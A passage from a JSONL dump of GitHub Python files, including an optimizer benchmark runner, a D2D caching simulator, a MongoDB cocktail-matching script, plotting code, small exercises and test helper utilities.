acqf_initializer, #\"global\":{}, \"cmaes\":{},\"ga\":{},\"topN\":{}\n # optimizers={\"global\":{},\"topN\":{},\"cmaes\":{},\"multi_size_local\":{'length':[ 0.5**1, 0.5**2, 0.5**3, 0.5**4]}},#\"multi_size_local\":{'length':[ 0.5**3, 0.5**4, 0.5**5, 0.5**6]}\n minimize=True,\n verbose=True, # Print information from each batch\n use_ard=True, # Set to true if you want to use ARD for the GP kernel\n max_cholesky_size=2000, # changed,2000\n n_training_steps=50, # Number of steps of ADAM to learn the hypers\n min_cuda=1024, # Run on the CPU for small datasets\n device=args.device, # \"cpu\" or \"cuda\"\n dtype=args.dtype, # float64 or float32\n istrackcands = args.istrackcands,\n istrackAF = args.istrackAF,\n )\n AIBO.optimize()\n print('cost time:',time.time()-t0)\n print('='*20)\n\n\n\nelif args.method == 'cmaes':\n x0 = np.random.rand(f.dim)\n sigma0=0.2\n import cma\n t0=time.time()\n es = cma.CMAEvolutionStrategy(\n x0 = x0,#np.random.rand(f.dim),\n sigma0=sigma0,\n inopts={'bounds': [0, 1], \"popsize\": args.batch_size}\n )#, 'maxfevals':5000, 'tolx':1e-4\n \n # es1 = cma.CMAEvolutionStrategy(\n # x0 = 0.5*np.ones(f.dim), # np.random.rand(f.dim), 0.5*np.ones(f.dim)\n # sigma0=0.001,\n # inopts={'bounds': [0, 1], \"popsize\": args.batch_size}\n # )\n # xs1 = es1.ask()\n \n num=0\n n_evals=0\n \n # while not es.stop():\n while n_evals< args.iters and not es.stop(): #\n xs = es.ask()\n y=[f(np.array(f.lb)+(np.array(f.ub)-np.array(f.lb))*x) for x in xs]\n es.tell(xs, y)\n num += len(xs)\n n_evals += len(xs)\n # print(np.round(xs[0],3))\n if num>100:\n # print(np.round(xs[0],3))\n print(es.sigma)\n print('{}) {} fbest={}'.format(n_evals, args.func, es.best.f))\n num=0\n print('best y:',es.best.f)\n print('best x:',es.best.x)\n print('cost time:',time.time()-t0)\n \n\n\n\n\n\n \nelif args.method == 'turbo':\n from baselines.TuRBO.turbo_1 import Turbo1\n t0=time.time()\n turbo1 = Turbo1(\n f=f, # Handle to objective function\n lb=f.lb, # Numpy array specifying lower bounds\n ub=f.ub, # Numpy array specifying upper bounds\n n_init=2*args.batch_size, # Number of initial bounds from an Latin hypercube design\n max_evals = args.iters, # Maximum number of evaluations\n batch_size=args.batch_size, # How large batch size TuRBO uses\n verbose=True, # Print information from each batch\n use_ard=True, # Set to true if you want to use ARD for the GP kernel\n max_cholesky_size=2000, # When we switch from Cholesky to Lanczos\n n_training_steps=50, # Number of steps of ADAM to learn the hypers\n min_cuda=1024, # Run on the CPU for small datasets\n device=args.device, # \"cpu\" or \"cuda\"\n dtype=args.dtype, # float64 or float32\n )\n turbo1.optimize()\n print('cost time:',time.time()-t0)\n X = turbo1.X # Evaluated points\n fX = turbo1.fX # Observed values\n ind_best = np.argmin(fX)\n f_best, x_best = fX[ind_best], X[ind_best, :]\n print('best x:',x_best)\n print('best y:',f_best)\n \n\nelif args.method == 'ga':\n from pymoo.algorithms.soo.nonconvex.ga import GA\n from pymoo.core.problem import Problem\n from pymoo.core.evaluator import Evaluator\n from pymoo.core.termination import NoTermination\n from pymoo.core.population import Population\n t0=time.time()\n problem = Problem(n_var=f.dim, n_obj=1, n_constr=0, xl=np.zeros(f.dim), xu=np.ones(f.dim))\n termination = NoTermination()\n pop_size=50\n n_offsprings=args.batch_size\n algorithm = GA(pop_size=pop_size,n_offsprings=n_offsprings)\n algorithm.setup(problem, termination=termination)\n num=0\n n_evals=0\n while n_evals< args.iters:\n pop = algorithm.ask()\n # pop1=deepcopy(pop)\n # if n_evals==0:\n # for _ in range(1):\n # xs=np.random.rand(pop_size,f.dim)\n # pop1.set(\"X\", xs)\n # y=[f(np.array(f.lb)+(np.array(f.ub)-np.array(f.lb))*x) for x in xs]\n # pop1.set(\"F\", np.array(y).reshape(-1,1))\n # pop=Population.merge(pop, pop1)\n\n # else:\n # pop=pop[np.random.choice(n_offsprings, args.batch_size,replace=False)]\n xs = pop.get(\"X\")\n y=[f(np.array(f.lb)+(np.array(f.ub)-np.array(f.lb))*x) for x in xs]\n pop.set(\"F\", np.array(y).reshape(-1,1))\n # set_cv(pop)\n algorithm.tell(infills=pop)\n n_evals+=len(xs)\n num += len(xs)\n if num>100:\n print('{}) {} fbest={}'.format(n_evals, args.func, algorithm.result().F[0]))\n num=0\n res = algorithm.result()\n print('best y:',res.F[0])\n print('cost time:',time.time()-t0)\n\n \nelif args.method == 'random':\n import nevergrad as ng\n init=f.lb+np.random.rand()*(f.ub-f.lb)\n init=0.5*(f.lb+f.ub)\n param = ng.p.Array(init=init).set_bounds(lower=f.lb, upper=f.ub)\n ran = ng.optimizers.RandomSearch(parametrization=param, budget = args.iters, num_workers=args.batch_size)\n recommendation = ran.minimize(f)\n\n\n\n\n\n\n\n\n\n\n\nelif args.method == 'anneal': \n bounds = []\n for idx in range(0, len(f.lb) ):\n bounds.append( ( float(f.lb[idx]), float(f.ub[idx])) )\n res = scipy.optimize.dual_annealing(f, \n bounds=bounds, \n maxfun=args.iters,\n local_search_options={'method':'L-BFGS-B','options':{'maxfun': args.iters}}\n )\n print('best y:',res.fun)\n \nelif args.method == 'de':\n import nevergrad as ng\n init=f.lb+np.random.rand()*(f.ub-f.lb)\n init=0.5*(f.lb+f.ub)\n param = ng.p.Array(init=init).set_bounds(lower=f.lb, upper=f.ub)\n de = ng.optimizers.DE(parametrization=param, budget = args.iters, num_workers=args.batch_size)\n recommendation = de.minimize(f)\n\nelif args.method == 'ngopt':\n import nevergrad as ng\n init=0.5*(f.lb+f.ub)\n param = ng.p.Array(init=init).set_bounds(lower=f.lb, upper=f.ub)\n ngo = ng.optimizers.NGOpt(parametrization=param, budget = args.iters, num_workers=args.batch_size)\n recommendation = ngo.minimize(f)\n x=recommendation.value\n print('best y:',f(x))\n \nelif args.method == 'cgde':\n import nevergrad as ng\n param = ng.p.Array(init=0.5*(f.lb+f.ub)).set_bounds(lower=f.lb, upper=f.ub)\n de = ng.optimizers.GeneticDE(parametrization=param, budget = args.iters, num_workers=args.batch_size)\n recommendation = de.minimize(f)\n x=recommendation.value\n print('best y:',f(x))\n \n\n \nelif args.method == 'lbfgsb': \n bounds = []\n for idx in range(0, len(f.lb) ):\n bounds.append( ( float(f.lb[idx]), float(f.ub[idx])) )\n res = scipy.optimize.minimize(f, \n x0 = np.array(f.lb) + (np.array(f.ub)- np.array(f.lb))*np.random.rand(f.dim), \n method='L-BFGS-B', \n bounds=bounds, \n options={'maxfun': args.iters, 'maxiter': 15000, 'iprint': - 1, 'maxls': 20}\n )\n \nelif args.method == 'bobyqa': \n import pybobyqa\n x0=np.array(f.lb) + (np.array(f.ub)-np.array(f.lb))*np.random.rand(f.dim)\n soln=pybobyqa.solve(f, x0, bounds=(f.lb,f.ub), maxfun=args.iters)\n print('best y:',soln.f)\n\nelif args.method == 'lamcts':\n from LAMCTS.lamcts import MCTS\n t0=time.time()\n if args.func ==\"Ant\":\n Cp=10\n leaf_size=100\n kernel_type='linear'\n else:\n Cp=1\n \n\nelif args.method == 'opentuner':\n from baselines.OpenTuner.tuner import OpenTuner\n args.f=f\n OpenTuner.main(args)\nelse:\n print(\"no such method\")\n \n# X = AIBO.X # Evaluated points\n# fX = AIBO.fX # Observed values\n# ind_best = np.argmin(fX)\n# f_best, x_best = fX[ind_best], X[ind_best, :]\n\n# print(\"Best value found:\\n\\tf(x) = %.3f\\nObserved at:\\n\\tx = %s\" % (f_best, np.around(x_best, 3)))\n\n#fig = plt.figure(figsize=(7, 5))\n#matplotlib.rcParams.update({'font.size': 16})\n#plt.plot(fX, 'b.', ms=10) # Plot all evaluated points as blue dots\n#plt.plot(np.minimum.accumulate(fX), 'r', lw=3) # Plot cumulative minimum as a red line\n#plt.xlim([0, len(fX)])\n#plt.ylim([0, 30])\n#plt.title(\"20D Levy function\")\n#\n#plt.tight_layout()\n#plt.show()\n\n\n","repo_name":"gloaming2dawn/AIBO","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":12392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72310673765","text":"def solution(n):\n a = n**(1/2)\n s = str(a)\n if s[-2:] == '.0':\n a = float(s)\n a = int(a)\n answer = (a+1)**2\n else:\n answer = -1\n return answer\n \nprint(solution(144))","repo_name":"leeminseok8/algorithm","sub_path":"programers/level1/11.정수제곱근판별/answer11.py","file_name":"answer11.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74668962725","text":"import terrain\nimport device\nimport content\nimport random\nimport plotter\n\nfrom parameters import *\n\n\nclass Simulator:\n\n def __init__(self):\n self.terrestrial = terrain.Terrain(TERRAIN_SIZE)\n\n self.place_base_station()\n self.place_satellite()\n self.place_mobiles_randomly(NUMBER_OF_USERS)\n\n # Generate content with zipf distribution\n self.contents = content.generate_zipf_content(NUMBER_OF_CONTENTS, CONTENT_SIZE, ZIPF_PARAMETER)\n\n def place_base_station(self):\n base_station = device.BaseStation(BASE_STATION_CACHE_CAPACITY, \"LRU\", BASE_STATION_RANGE)\n base_station.x = int(TERRAIN_SIZE / 2)\n base_station.y = int(TERRAIN_SIZE / 2) # Located in center of terrain\n self.terrestrial.add_base_station(base_station)\n\n def place_satellite(self):\n satellite = device.Satellite(SATELLITE_CACHE_CAPACITY, \"LRU\", SATELLITE_DISTANCE)\n self.terrestrial.add_satellite(satellite)\n\n def place_mobiles_randomly(self, number_of_users):\n for i in range(number_of_users):\n new_mobile = device.Mobile(i, MOBILE_CACHE_CAPACITY, \"LRU\", MOBILE_RANGE)\n new_mobile.x = random.randint(0, TERRAIN_SIZE - 1) # x coordinate\n new_mobile.y = random.randint(0, TERRAIN_SIZE - 1) # y coordinate\n self.terrestrial.add_mobile(new_mobile)\n\n def print_cache_stats(self, message):\n print(message)\n print(\"Number of contents: {}\".format(len(self.contents)))\n print(\"Number of self cache hits: {}\".format(self.terrestrial.self_hit))\n print(\"Number of d2d cache hits: {}\".format(self.terrestrial.d2d_hit))\n print(\"Number of base station cache hits: {}\".format(self.terrestrial.bs_hit))\n print(\"Number of satellite cache hits: {}\".format(self.terrestrial.sat_hit))\n print(\"Number of cache miss: {}\".format(self.terrestrial.miss))\n print(\"-------------------------------------------\")\n\n # A random user requests file\n def request_contents_randomly(self):\n for c in self.contents:\n user = random.choice(self.terrestrial.mobiles)\n self.terrestrial.content_request(user, c)\n\n # Returns the cache hit results of given algorithm and number of contents\n def num_contents_test(self, algorithm, num_contents):\n self.terrestrial.clear_caches()\n self.terrestrial.base_station.set_cache(BASE_STATION_CACHE_CAPACITY, algorithm)\n self.terrestrial.satellite.set_cache(SATELLITE_CACHE_CAPACITY, algorithm)\n\n for mobile in self.terrestrial.mobiles:\n mobile.set_cache(MOBILE_CACHE_CAPACITY, algorithm)\n\n self_hits = []\n d2d_hits = []\n bs_hits = []\n sat_hits = []\n universal = []\n\n for i in range(len(self.contents)):\n user = random.choice(self.terrestrial.mobiles)\n self.terrestrial.content_request(user, self.contents[i])\n\n if i+1 in num_contents:\n self_hits.append(self.terrestrial.self_hit / i)\n d2d_hits.append(self.terrestrial.d2d_hit / i)\n bs_hits.append(self.terrestrial.bs_hit / i)\n sat_hits.append(self.terrestrial.sat_hit / i)\n universal.append(self.terrestrial.miss / i)\n\n return self_hits, d2d_hits, bs_hits, sat_hits, universal\n\n def compare_num_contents(self):\n num_contents = [10000, 50000, 100000, 250000, 500000]\n\n lru_results = self.num_contents_test(\"LRU\", num_contents)\n mlplru_results = self.num_contents_test(\"MLPLRU\", num_contents)\n cache_me_cache_results = self.num_contents_test(\"Cache-Me-Cache\", num_contents)\n\n plotter.plot_content_comparison(lru_results, mlplru_results, cache_me_cache_results, num_contents)\n\n def zipf_test(self, algorithm, zipf_values):\n self.terrestrial.clear_caches()\n self.terrestrial.base_station.set_cache(BASE_STATION_CACHE_CAPACITY, algorithm)\n self.terrestrial.satellite.set_cache(SATELLITE_CACHE_CAPACITY, algorithm)\n\n for mobile in self.terrestrial.mobiles:\n mobile.set_cache(MOBILE_CACHE_CAPACITY, algorithm)\n\n self_hits = []\n d2d_hits = []\n bs_hits = []\n sat_hits = []\n universal = []\n\n for value in zipf_values:\n self.contents = content.generate_zipf_content(NUMBER_OF_CONTENTS, CONTENT_SIZE, value)\n for i in range(len(self.contents)):\n user = random.choice(self.terrestrial.mobiles)\n self.terrestrial.content_request(user, self.contents[i])\n\n self_hits.append(self.terrestrial.self_hit / len(self.contents))\n d2d_hits.append(self.terrestrial.d2d_hit / len(self.contents))\n bs_hits.append(self.terrestrial.bs_hit / len(self.contents))\n sat_hits.append(self.terrestrial.sat_hit / len(self.contents))\n universal.append(self.terrestrial.miss / len(self.contents))\n self.terrestrial.clear_caches()\n\n return self_hits, d2d_hits, bs_hits, sat_hits, universal\n\n def compare_zipf_parameter(self):\n zipf_values = [1.2, 1.3, 1.4, 1.5, 1.6]\n\n lru_results = self.zipf_test(\"LRU\", zipf_values)\n mlplru_results = self.zipf_test(\"MLPLRU\", zipf_values)\n cache_me_cache_results = self.zipf_test(\"Cache-Me-Cache\", zipf_values)\n\n plotter.plot_zipf_distribution(lru_results, mlplru_results, cache_me_cache_results, zipf_values)\n\n def simulate_LRU(self):\n self.terrestrial.clear_caches()\n self.terrestrial.base_station.set_cache(BASE_STATION_CACHE_CAPACITY, \"LRU\")\n self.terrestrial.satellite.set_cache(SATELLITE_CACHE_CAPACITY, \"LRU\")\n\n for mobile in self.terrestrial.mobiles:\n mobile.set_cache(MOBILE_CACHE_CAPACITY, \"LRU\")\n\n self.request_contents_randomly()\n self.print_cache_stats(\"LRU\")\n\n def simulate_MLPLRU(self):\n self.terrestrial.clear_caches()\n self.terrestrial.base_station.set_cache(BASE_STATION_CACHE_CAPACITY, \"MLPLRU\")\n self.terrestrial.satellite.set_cache(SATELLITE_CACHE_CAPACITY, \"MLPLRU\")\n\n for mobile in self.terrestrial.mobiles:\n mobile.set_cache(MOBILE_CACHE_CAPACITY, \"MLPLRU\")\n\n self.request_contents_randomly()\n self.print_cache_stats(\"MLPLRU\")\n\n def simulate_Cache_Me_Cache(self):\n self.terrestrial.clear_caches()\n self.terrestrial.base_station.set_cache(BASE_STATION_CACHE_CAPACITY, \"Cache-Me-Cache\")\n self.terrestrial.satellite.set_cache(SATELLITE_CACHE_CAPACITY, \"Cache-Me-Cache\")\n\n for mobile in self.terrestrial.mobiles:\n mobile.set_cache(MOBILE_CACHE_CAPACITY, \"Cache-Me-Cache\")\n\n self.request_contents_randomly()\n self.print_cache_stats(\"Cache-Me-Cache\")\n\n def simulate(self):\n self.simulate_LRU()\n self.simulate_MLPLRU()\n self.simulate_Cache_Me_Cache()\n","repo_name":"arjnklc/D2D-Caching-Simulation","sub_path":"simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":6951,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"2282673422","text":"import urllib.request as req \nimport os\nimport re\n\nfrom bs4 import BeautifulSoup\nfrom subprocess import call # module to create subprogram instide our program\n\n\nos.system('cls')\nos.system('color e')\nos.system('title Videos')\n\nprint(\"1. Current Choice \")\nprint(\"2. Change Choice\\n\")\n\nchoice=int(input(\"Enter Your choice :\\n\"))\nprint(\" \")\nif 0(.*?) 100000), iagenew)\nunew = griddata2((xxold.ravel(),yyold.ravel()),u.ravel(),(xxnew,yynew), method = 'linear')\nunew = ma.masked_where((unew > 100000), unew)\nvnew = griddata2((xxold.ravel(),yyold.ravel()),v.ravel(),(xxnew,yynew), method = 'linear')\nvnew = ma.masked_where((vnew > 100000), vnew)\n\nsc1 = m.scatter(xxnew,yynew,c=iagenew,edgecolor='None',s=5,cmap='jet')\n#m.streamplot(xxnew,yynew,unew,vnew,density=3,arrowsize=2,arrowstyle='-|>',color='black')\n\nm.drawmeridians(np.arange(0,360,30))\nm.drawparallels(np.arange(-90,90,30))\nlayer = '%3.0fm'%(z_t[lvl]/100)\ncb = plt.colorbar(orientation='horizontal',extend='both')\ncb.set_label('$Potential\\/\\/Temperature\\/\\/(K)$',size=20)\ncb.ax.tick_params(labelsize=16) \nax.set_title('$MAA\\/\\/4x\\/\\/PI\\/\\/CO_2:\\/\\/\\/\\/%s$'%layer,size=24)\n\nplt.show()\n","repo_name":"vandegu/umich","sub_path":"eckert_iv_plot.py","file_name":"eckert_iv_plot.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23796922284","text":"import os\nimport re\nimport certifi\nfrom dotenv import load_dotenv\nfrom pymongo import MongoClient\n\nload_dotenv()\n\n\n# Connect to MongoDB\nmongodb_uri = os.getenv('MONGODB_URI')\nclient = MongoClient(mongodb_uri, tlsCAFile=certifi.where())\ndb = client['cocktails_db']\ncollection = db['cocktails']\n\n# List the ingredients you have (case-insensitive)\n# sugar syrup = simple syrup\ningredients_available = ['Tequila', 'Lemon', 'Lime', 'Rum', 'Dry Vermouth', 'Sweet Vermouth', 'Gin',\n 'Irish Cream', 'Sugar syrup', 'kahlua', 'grenadine', 'tonic water', 'vodka', 'sugar']\n\n# Set the 'diff' value\ndiff = 2\n\n# Create a case-insensitive regex pattern for each ingredient in ingredients_available\ningredient_patterns = [re.compile(ingredient, re.IGNORECASE) for ingredient in ingredients_available]\n\n# Use the $or operator to find cocktails with ingredients that match any of the regex patterns\nresults = collection.find({\n '$or': [{'ingredients.name': {'$regex': pattern}} for pattern in ingredient_patterns]\n})\n\n\n# Function to check if a base ingredient is in the available ingredients list\ndef is_base_ingredient_available(base_ingredient, available_ingredients):\n base_ingredient_words = set(base_ingredient.lower().split())\n\n for ingredient in available_ingredients:\n ingredient_words = set(ingredient.lower().split())\n\n if ingredient_words.issubset(base_ingredient_words):\n return True\n\n return False\n\n\n# Function to add oz measurements for shots (easier for bartending)\ndef convert_shots_to_ounces(measure):\n # Use a regular expression to find the numerical value and the word \"shot\" or \"shots\"\n pattern = r'(\\d+\\s*/\\s*\\d+|\\d+(\\.\\d+)?|\\d+)?(\\s*\\d+\\s*/\\s*\\d+)?\\s*(sho?t?s?)'\n match = re.search(pattern, measure, re.IGNORECASE)\n\n if match:\n # Extract the number from the match\n number1 = match.group(1)\n number2 = match.group(3)\n shot_word = match.group(4)\n\n total_number = 0.0\n\n if number1:\n # Convert the number to a float value\n if '/' in number1:\n numerator, denominator = number1.split('/')\n total_number += float(numerator) / float(denominator)\n else:\n total_number += float(number1)\n\n if number2:\n # Convert the second number to a float value\n if '/' in number2:\n numerator, denominator = number2.split('/')\n total_number += float(numerator) / float(denominator)\n\n if total_number > 0.0:\n # Convert the number of shots to ounces (assuming 1 shot = 1.5 ounces)\n ounces = total_number * 1.5\n\n # Update the measure string with the number in ounces and the original measure\n measure = f\"{measure} ({ounces:.1f} oz)\"\n\n return measure\n\n\n# Initialize an empty list to store the cocktails\ncocktails = []\n\nfor result in results:\n missing_ingredients_ct = 0\n missing_ingredients = []\n\n for ingredient in result['ingredients']:\n updated_measure = convert_shots_to_ounces(ingredient['measure'])\n ingredient['measure'] = updated_measure\n\n if not is_base_ingredient_available(ingredient['name'], ingredients_available):\n missing_ingredients_ct += 1\n missing_ingredients.append(ingredient['name'])\n\n if missing_ingredients_ct <= diff:\n result['missing_ingredients'] = missing_ingredients\n result['missing_ct'] = missing_ingredients_ct\n cocktails.append(result)\n\n# Sort the cocktails by the number of missing ingredients and then alphabetically by name\nsorted_cocktails = sorted(cocktails, key=lambda x: (x['missing_ct'], x['drink_name']))\n\n# Print the sorted cocktails\nprint(\"Cocktails you can make with the available ingredients and within the diff limit:\")\nfor cocktail in sorted_cocktails:\n print(f\"{cocktail['drink_name']} (missing {cocktail['missing_ct']} ingredient(s) {cocktail['missing_ingredients']})\")\n print(f\"\\t\\t{cocktail['ingredients']}\")\n print(f\"\\t\\t{cocktail['instructions']}\\n\")\n\n\n# Close the MongoDB connection\nclient.close()\n","repo_name":"anishxyz/smart-bar","sub_path":"query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15632325571","text":"def prvok_patri(prvok,s1):\n for i in s1:\n if prvok==i:\n return True\n else:\n return False\n\ndef niektory_znak(ret1,ret2):\n for i in set(ret1):\n if prvok_patri(i,set(ret2))==True:\n return 1\n else:\n return 0\ndef kazdy_znak(ret1,ret2):\n for i in set(ret1):\n if prvok_patri(i,set(ret2))==False:\n return 0\n else:\n return 1\n\ndef prienik_ret(ret1,ret2):\n s=set()\n for i in set(ret1):\n if prvok_patri(i,set(ret2))==True:\n s.add(i)\n return s\n\ndef viac(ret):\n pocet=0\n s=set()\n for i in range(len(ret)):\n for j in range(i+1,len(ret)):\n if ret[i]==ret[j]:\n pocet+=1\n if pocet>1:\n s.add(ret[i])\n return len(s)\nr1='ahoj'\nr2='mama'\nr3='ahoj'\nprint(niektory_znak(r1,r2))\nprint(kazdy_znak(r1,r2))\nprint(kazdy_znak(r1,r3))\nprint(prienik_ret(r1,r2))\nprint(viac(r2))\n\n\n","repo_name":"kirschovapetra/B-PROG1","sub_path":"11 28.11/03 retazce a mnoziny.py","file_name":"03 retazce a mnoziny.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34162032978","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom distutils.core import setup\n\nlong_description = \"\"\"PSDretrieval retrieves the particle size distribution from multi-frequency radar Doppler spectra.\n\"\"\"\n\nsetup(name='PSDretrieval',\n description='PSD retrieval',\n author='Markus Karrer',\n author_email='karrer.markus@web.de',\n url='https://github.com/markuskarrer/PSDretrieval',\n packages= ['PSDretrieval'],\n package_data = {\n '': ['sample_data'],\n },\n long_description = long_description,\n license = 'GPL',\n )\n\n\n","repo_name":"OPTIMICe-team/PSDretrieval","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"38863128000","text":"#!/usr/bin/env python3.3\r\nfrom functools import wraps, update_wrapper\r\nimport logging as log\r\nfrom logging.handlers import RotatingFileHandler\r\nfrom time import time\r\n#import zmq\r\nimport sys\r\nimport warnings as w\r\nimport traceback as tb\r\nfrom itertools import islice\r\nfrom time import ctime\r\nfrom concurrent.futures import Executor, as_completed\r\nfrom os import environ\r\nimport gc\r\nimport lxml.etree as et\r\nfrom uuid import uuid4\r\nfrom time import sleep\r\nfrom types import FunctionType as Function, GeneratorType as Generator\r\nfrom collections.abc import Iterable as Iterator\r\nfrom enum import Enum\r\n\"\"\"\r\nProduce a stack trace.\r\n'File \"{0.f_code.co_filename}\", line {0.f_lineno}, in {0.f_code.co_name}'.format(sys._getframe(1))\r\n\"\"\"\r\nclass RESULTCODES(Enum):\r\n PASS = 1\r\n FAIL = 0\r\n ERROR = -1\r\n\r\n\r\ndef expectEqual(a, b, msg, stacklevel=2):\r\n rslt = True\r\n try:\r\n if a != b:\r\n rslt = False\r\n w.warn(msg, stacklevel=stacklevel)\r\n except:\r\n pass\r\n return rslt\r\n\r\ndef expectNotEqual(a, b, msg, stacklevel=2):\r\n rslt = True\r\n try:\r\n if a == b:\r\n rslt = False\r\n w.warn(msg, stacklevel=stacklevel)\r\n except:\r\n pass\r\n return rslt\r\n\r\ndef expectLT(a, b, msg, stacklevel=2):\r\n rslt = True\r\n try:\r\n if a >= b:\r\n rslt = False\r\n w.warn(msg, stacklevel=stacklevel)\r\n except:\r\n pass\r\n return rslt\r\n\r\ndef expectGT(a, b, msg, stacklevel=2):\r\n rslt = True\r\n try:\r\n if a <= b:\r\n rslt = False\r\n w.warn(msg, stacklevel=stacklevel)\r\n except:\r\n pass\r\n return rslt\r\n\r\ndef expectStrEqNoCase(a, b, msg, stacklevel=2):\r\n rslt = True\r\n try:\r\n if a.lower() != b.lower():\r\n rslt = False\r\n w.warn(msg, stacklevel=stacklevel)\r\n except:\r\n pass\r\n return rslt\r\n\r\n\r\ndef expectTrue(a, msg):\r\n rslt = expectEqual(a, True, msg, stacklevel=3)\r\n return rslt\r\n\r\ndef expectFalse(a, msg):\r\n rslt = expectEqual(a, False, msg, stacklevel=3)\r\n return rslt\r\n\r\n\r\ndef GetWindowsService(name: str, usr: str, pword: str, machine='') -> object:\r\n from wmi import WMI\r\n interface = WMI(computer=machine, user=usr, password=pword)\r\n service = interface.Win32_Service(Name=name)[0]\r\n assert service, \"Service name is invalid\"\r\n class Service(object):\r\n def __init__(self, svc):\r\n self.__service = svc\r\n return\r\n def start(self):\r\n rslt, = self.__service.StartService()\r\n return True if rslt == 0 else False\r\n def stop(self):\r\n rslt, = self.__service.StopService()\r\n return True if rslt == 0 else False\r\n def pause(self):\r\n rslt, = self.__service.PauseService()\r\n return True if rslt == 0 else False\r\n def resume(self):\r\n rslt, = self.__service.ResumeService()\r\n return True if rslt == 0 else False\r\n return Service(service)\r\n\r\n#TODO: Create a file like object that publishes data written to a zmq server.\r\n#TODO: add more info attributes to the exceptions\r\n\r\ndef isDebug(__cache=[]):\r\n return bool(int(environ.get(\"DEBUG\", False)))\r\n\r\ndef setDebug(dbg: bool):\r\n environ[\"DEBUG\"] = str(int(dbg))\r\n return\r\n\r\n\r\nclass TestFailed(RuntimeWarning):\r\n pass\r\n\r\nclass ExpectedFail(RuntimeWarning):\r\n pass\r\n\r\nclass TestError(RuntimeWarning):\r\n pass\r\n\r\ndef verify(func):\r\n #TODO: Setup reverse push client for test status\r\n #TODO: send the exception to the server\r\n def sendToZMQ(msg):\r\n pass\r\n @wraps(func)\r\n def decorator(*args, **kw):\r\n rslt = None\r\n #nonlocal func\r\n try:\r\n with w.catch_warnings(record=True) as warn:\r\n rslt = func(*args, **kw)\r\n for x in warn:\r\n sendToZMQ(*x)\r\n except Exception as e:\r\n sendToZMQ(e)\r\n return rslt\r\n return decorator\r\n\r\ndef testsetup(func):\r\n #TODO: Execute the func in a seperate thread.\r\n #TODO: setup zmq pull server for test status\r\n #TODO: Log the status messages.\r\n def sendToZMQ(msg):\r\n return #TODO: Send warning text over socket.\r\n @wraps(func)\r\n def decorator(*args, **kw):\r\n #nonlocal func\r\n rslt = None\r\n try:\r\n rslt = func(*args, **kw)#TODO: Might need to run this in a seperate thread.\r\n except Exception as e:\r\n sendToZMQ(e)\r\n return rslt\r\n return decorator\r\n\r\ndef typecheck(f):\r\n \"\"\"\r\n decorator for checking param types versus the annotations on function parameters.\r\n \"\"\"\r\n @wraps(f)\r\n def wrapped(*args, **kws):\r\n for i, name in enumerate(f.__code__.co_varnames):\r\n argtype = f.__annotations__.get(name)\r\n # Only check if annotation exists and it is as a type\r\n if isinstance(argtype, type):\r\n # First len(args) are positional, after that keywords\r\n if i < len(args):\r\n assert isinstance(args[i], argtype)\r\n elif name in kws:\r\n assert isinstance(kws[name], argtype)\r\n result = f(*args, **kws)\r\n returntype = f.__annotations__.get('return')\r\n if isinstance(returntype, type):\r\n assert isinstance(result, returntype)\r\n return result\r\n return wrapped\r\n\r\ndef autodebug(type, value, tb):\r\n \"\"\"\r\n Break into the debugger on an unhandled exception.\r\n \"\"\"\r\n if hasattr(sys, \"ps1\") or not sys.stderr.isatty():\r\n #we're in the repl or something.\r\n sys.__excepthook__(type, value, tb)\r\n else:\r\n import traceback, pdb\r\n traceback.print_exception(type, value, tb)\r\n print(\"\\n\")\r\n pdb.pm()\r\n return\r\n\r\ndef deprecationWarning(msg):\r\n w.warn(\"%s: %s\"%(ctime(),msg), category=DeprecationWarning, stacklevel=2)\r\n return\r\n\r\ndef deprecated(func):\r\n '''This is a decorator which can be used to mark functions\r\n as deprecated. It will result in a warning being emitted\r\n when the function is used.'''\r\n @wraps(func)\r\n def wrapped(*args, **kwargs):\r\n deprecationWarning(\"Call to deprecated function %s.\"%func.__qualname__)\r\n return func(*args, **kwargs)\r\n wrapped.__name__ = func.__name__\r\n wrapped.__doc__ = func.__doc__\r\n wrapped.__dict__.update(func.__dict__)\r\n return wrapped\r\n\r\nclass Retry(object):\r\n \"\"\"\r\n Retry a failed function. Useful for networking. If func returns False or throws an exception then the retry occurs with an appropriate pause.\r\n \"\"\"\r\n def __init__(self, attempts, pause = None):\r\n self.__attempts = int(abs(attempts))\r\n self.__count = 0\r\n self.__func = None\r\n self.__pause = pause\r\n return\r\n def __call__(self, func):\r\n assert func, \"Function is invalid.\"\r\n self.__func = func\r\n @wraps(func)\r\n def wrapped(*args, **kw):\r\n doretry = True\r\n rslt = None\r\n count = 0\r\n exc = None\r\n while doretry and count < self.__attempts:\r\n count += 1\r\n exc = None\r\n try:\r\n rslt = self.__func(*args, **kw)\r\n doretry = True if not rslt else False\r\n exc = None\r\n except Exception as e:\r\n retryWarning(\"Exception in %s because %s\\nparameters: %s\\n%s\"%(self.__func.__qualname__, e, args, kw))\r\n tb.print_tb(sys.exc_info()[2])\r\n doretry = True\r\n exc = e\r\n finally:\r\n if doretry and self.__pause: sleep(self.__pause)\r\n if count > 1: retryWarning(\"retried %s %s times\"%(self.__func.__qualname__, count))\r\n if count >= self.__attempts: retryWarning(\"Retry attempts exceeded for %s\"%self.__func.__qualname__)\r\n if exc: raise exc\r\n return rslt\r\n return wrapped\r\n\r\ndef loggingSetup(LOGFILEPATH, LOGLEVEL=log.DEBUG):\r\n LOGFORMAT = \"%(asctime)-15s %(levelname)-8s: %(threadName)-8s: 